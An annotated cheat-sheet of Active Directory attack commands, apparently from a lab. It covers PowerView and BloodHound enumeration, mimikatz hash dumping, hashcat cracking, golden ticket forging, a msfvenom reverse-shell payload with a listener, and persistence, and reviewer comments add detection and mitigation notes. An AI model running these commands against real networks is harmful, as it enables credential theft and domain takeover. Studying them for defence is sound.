# Mixed command cheat-sheet (PowerShell, mimikatz, hashcat, msfconsole, scp) rather than a
# runnable script: the lines belong to different interpreters and are pasted one at a time.
# The comments below translate the original Chinese notes and add the caveats a reviewer
# would want next to each step (what is logged, what the usual mitigation is).
#
# Relaxes the execution policy for this one session; execution policy is not a security
# boundary. Where PowerShell script block logging is enabled, the content of the scripts
# dot-sourced below is still recorded.
powershell -ep bypass
# Dot-source PowerView from the current directory (the .ps1 must already be present).
. .\PowerView.ps1
Get-NetUser | select cn # enumerate domain users (common names only)
# Enumerate domain groups whose name matches *admin*.
# NOTE(review): there is no space before '#', so PowerShell treats "#枚举域组" as part of
# the -GroupName argument rather than as a comment — presumably a typo in the notes.
Get-NetGroup -GroupName *admin*#枚举域组
Invoke-sharefinder # shared folders
Get-NetComputer -fulldata # systems (hosts), all properties
# Same as the first query, without the cn projection.
Get-NetUser
# Dot-source SharpHound and run a full BloodHound collection for CONTROLLER.local into a zip.
# Collection of this kind is a burst of LDAP queries and SMB session/share enumeration from
# a single host, which is the usual detection signal for it.
. .\SharpHound.ps1
Invoke-Bloodhound -CollectionMethod All -Domain CONTROLLER.local -ZipFileName loot.zip
# Pull the zip back over SSH. Judging by this line, the file on disk carries a timestamp
# prefix in front of the name given above — verify the actual name before copying.
scp Administrator@10.10.11.93:20220811025924_loot.zip 20220811025924_loot.zip
# Interactive mimikatz session; the following lines are mimikatz commands, not shell.
.\mimikatz.exe
# Needs SeDebugPrivilege (local administrator); enabling it is itself auditable where
# privilege-use auditing is turned on.
privilege::debug
# Dump account hashes from the LSA. LSASS protection (RunAsPPL) and Credential Guard are the
# standard mitigations for this step.
lsadump::lsa /patch
# Offline crack of the dumped NTLM hashes (-m 1000) against rockyou; hash.txt is assumed to
# hold the output of the dump above — confirm its format.
hashcat -m 1000 hash.txt /usr/share/wordlists/rockyou.txt

# Extract the krbtgt account secret, then forge a TGT with it. Original note: "golden ticket".
# A forged TGT remains valid until the krbtgt password has been rotated twice, so rotation
# is the remediation; detection relies on service-ticket requests (4769) with no matching
# TGT issuance (4768) on any DC — confirm against the domain's audit configuration.
lsadump::lsa /inject /name:krbtgt
kerberos::golden /user:Administrator /domain:controller.local /sid:S-1-5-21-849420856-2351964222-986696166 /krbtgt:5508500012cc005cf7082a9a89ebdfdf /id:500 #黄金票据

# The next line is a note, not a command: "Event Viewer — inspect the event logs".
Event Viewer 查看事件日志

# Generate a reverse-TCP meterpreter executable. LHOST is loopback here, so as written the
# payload would connect back to the host it runs on — presumably a placeholder to fill in.
msfvenom -p windows/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=5555 -f exe -o shell.exe
# msfconsole commands from here on. Original note: "create listener".
# NOTE(review): as on the Get-NetGroup line, no space before '#', so msfconsole would
# receive "exploit/multi/handler#创建监听器" as the module name.
use exploit/multi/handler#创建监听器
set payload windows/meterpreter/reverse_tcp
# No value given — presumably filled in at run time to match the LHOST used by msfvenom.
set LHOST
run

# persistence
# Local persistence module against session 1; the snippet ends before the module is run.
# Persistence of this kind surfaces as a new autostart entry on the host (registry run key,
# scheduled task or similar — verify against the module's documentation), which is what a
# baseline of autostart locations should catch.
use exploit/windows/local/persistence
set session 1